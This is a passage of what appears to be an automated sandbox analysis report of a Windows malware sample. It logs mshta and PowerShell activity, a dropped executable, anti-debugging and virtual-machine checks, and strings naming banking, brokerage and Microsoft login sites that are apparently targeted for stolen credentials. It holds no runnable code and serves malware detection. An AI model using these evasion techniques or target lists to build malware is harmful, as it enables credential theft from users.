          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0160D1C0 rdtsc 7_2_0160D1C0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1927Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1425Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4299Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5524Jump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 1205Jump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 8766Jump to behavior
          Source: C:\Users\user\AppData\Roaming\rooma.exeAPI coverage: 0.8 %
          Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 3.0 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep time: -14757395258967632s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 7604Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 7720Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8036Thread sleep count: 1205 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8036Thread sleep time: -2410000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8036Thread sleep count: 8766 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8036Thread sleep time: -17532000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe TID: 8048Thread sleep time: -70000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe TID: 8048Thread sleep count: 33 > 30Jump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe TID: 8048Thread sleep time: -49500s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe TID: 8048Thread sleep count: 36 > 30Jump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe TID: 8048Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0256BAB0 FindFirstFileW,FindNextFileW,FindClose,10_2_0256BAB0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: powershell.exe, 00000005.00000002.1464884328.0000021E7C6DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}11ee-8
          Source: F56GKLK7U4.10.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
          Source: F56GKLK7U4.10.drBinary or memory string: discord.comVMware20,11696494690f
          Source: F56GKLK7U4.10.drBinary or memory string: AMC password management pageVMware20,11696494690
          Source: F56GKLK7U4.10.drBinary or memory string: outlook.office.comVMware20,11696494690s
          Source: F56GKLK7U4.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
          Source: F56GKLK7U4.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
          Source: F56GKLK7U4.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
          Source: F56GKLK7U4.10.drBinary or memory string: interactivebrokers.comVMware20,11696494690
          Source: F56GKLK7U4.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
          Source: netbtugc.exe, 0000000A.00000002.3833651753.000000000288E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^)w
          Source: F56GKLK7U4.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
          Source: F56GKLK7U4.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
          Source: F56GKLK7U4.10.drBinary or memory string: outlook.office365.comVMware20,11696494690t
          Source: mshta.exe, 00000003.00000003.1487536110.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490295950.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489347883.00000237E12E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E12DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E12E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3113246043.0000024A0885C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: F56GKLK7U4.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
          Source: mshta.exe, 00000003.00000003.1486769366.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489347883.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E1315000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@k
          Source: F56GKLK7U4.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
          Source: F56GKLK7U4.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
          Source: F56GKLK7U4.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
          Source: netbtugc.exe, 0000000A.00000002.3842765739.00000000078F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs.comVMware20,11696494690
          Source: powershell.exe, 00000005.00000002.1464884328.0000021E7C63E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000F.00000002.1887708377.000002417EBEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: F56GKLK7U4.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
          Source: F56GKLK7U4.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
          Source: F56GKLK7U4.10.drBinary or memory string: tasks.office.comVMware20,11696494690o
          Source: F56GKLK7U4.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
          Source: F56GKLK7U4.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
          Source: svchost.exe, 00000008.00000002.3112138074.0000024A0322B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
          Source: F56GKLK7U4.10.drBinary or memory string: dev.azure.comVMware20,11696494690j
          Source: F56GKLK7U4.10.drBinary or memory string: global block list test formVMware20,11696494690
          Source: powershell.exe, 00000005.00000002.1464884328.0000021E7C6DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C
          Source: TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3834147913.000000000063F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
          Source: F56GKLK7U4.10.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
          Source: F56GKLK7U4.10.drBinary or memory string: bankofamerica.comVMware20,11696494690x
          Source: F56GKLK7U4.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
          Source: F56GKLK7U4.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
          Source: F56GKLK7U4.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
          Source: F56GKLK7U4.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
          Source: F56GKLK7U4.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
          Source: F56GKLK7U4.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\rooma.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0160D1C0 rdtsc 7_2_0160D1C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009C7823 LdrLoadDll,7_2_009C7823
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01597152 mov eax, dword ptr fs:[00000030h]7_2_01597152
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01596154 mov eax, dword ptr fs:[00000030h]7_2_01596154
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01596154 mov eax, dword ptr fs:[00000030h]7_2_01596154
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158C156 mov eax, dword ptr fs:[00000030h]7_2_0158C156
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01589148 mov eax, dword ptr fs:[00000030h]7_2_01589148
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01589148 mov eax, dword ptr fs:[00000030h]7_2_01589148
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01589148 mov eax, dword ptr fs:[00000030h]7_2_01589148
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01589148 mov eax, dword ptr fs:[00000030h]7_2_01589148
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01629179 mov eax, dword ptr fs:[00000030h]7_2_01629179
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01624144 mov eax, dword ptr fs:[00000030h]7_2_01624144
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01624144 mov eax, dword ptr fs:[00000030h]7_2_01624144
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01624144 mov ecx, dword ptr fs:[00000030h]7_2_01624144
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01624144 mov eax, dword ptr fs:[00000030h]7_2_01624144
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01624144 mov eax, dword ptr fs:[00000030h]7_2_01624144
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h]7_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01665152 mov eax, dword ptr fs:[00000030h]7_2_01665152
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01591131 mov eax, dword ptr fs:[00000030h]7_2_01591131
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01591131 mov eax, dword ptr fs:[00000030h]7_2_01591131
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158B136 mov eax, dword ptr fs:[00000030h]7_2_0158B136
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158B136 mov eax, dword ptr fs:[00000030h]7_2_0158B136
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158B136 mov eax, dword ptr fs:[00000030h]7_2_0158B136
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158B136 mov eax, dword ptr fs:[00000030h]7_2_0158B136
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01650115 mov eax, dword ptr fs:[00000030h]7_2_01650115
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C0124 mov eax, dword ptr fs:[00000030h]7_2_015C0124
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0163A118 mov ecx, dword ptr fs:[00000030h]7_2_0163A118
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0163A118 mov eax, dword ptr fs:[00000030h]7_2_0163A118
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0163A118 mov eax, dword ptr fs:[00000030h]7_2_0163A118
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0163A118 mov eax, dword ptr fs:[00000030h]7_2_0163A118
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016661E5 mov eax, dword ptr fs:[00000030h]7_2_016661E5
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CD1D0 mov eax, dword ptr fs:[00000030h]7_2_015CD1D0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CD1D0 mov ecx, dword ptr fs:[00000030h]7_2_015CD1D0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C01F8 mov eax, dword ptr fs:[00000030h]7_2_015C01F8
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016561C3 mov eax, dword ptr fs:[00000030h]7_2_016561C3
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016561C3 mov eax, dword ptr fs:[00000030h]7_2_016561C3
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016651CB mov eax, dword ptr fs:[00000030h]7_2_016651CB
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0160E1D0 mov eax, dword ptr fs:[00000030h]7_2_0160E1D0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0160E1D0 mov eax, dword ptr fs:[00000030h]7_2_0160E1D0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0160E1D0 mov ecx, dword ptr fs:[00000030h]7_2_0160E1D0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0160E1D0 mov eax, dword ptr fs:[00000030h]7_2_0160E1D0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0160E1D0 mov eax, dword ptr fs:[00000030h]7_2_0160E1D0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h]7_2_015B51EF
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h]7_2_015B51EF
